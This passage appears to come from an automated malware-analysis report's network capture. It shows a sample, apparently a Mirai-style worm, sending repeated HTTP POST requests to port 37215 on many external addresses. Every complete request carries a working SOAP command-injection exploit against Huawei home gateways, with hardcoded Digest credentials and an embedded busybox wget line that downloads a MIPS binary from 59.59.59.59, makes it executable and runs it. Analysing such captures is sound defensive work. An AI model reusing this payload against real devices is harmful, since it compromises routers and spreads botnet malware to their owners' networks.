                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          413192.168.2.153475641.165.149.16237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.568468094 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          414192.168.2.156064841.235.20.23937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.568491936 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          415192.168.2.1539130157.44.251.15037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.568653107 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          416192.168.2.1535478157.199.54.4437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.568739891 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          417192.168.2.1538554157.91.181.4937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.569014072 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          418192.168.2.154460441.195.131.18937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.569216967 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          419192.168.2.1542574197.5.234.8537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.569231987 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          420192.168.2.1554128197.184.214.937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.569312096 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          421192.168.2.154506441.149.189.23237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.569401026 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          422192.168.2.1544696157.49.74.17037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.569422960 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
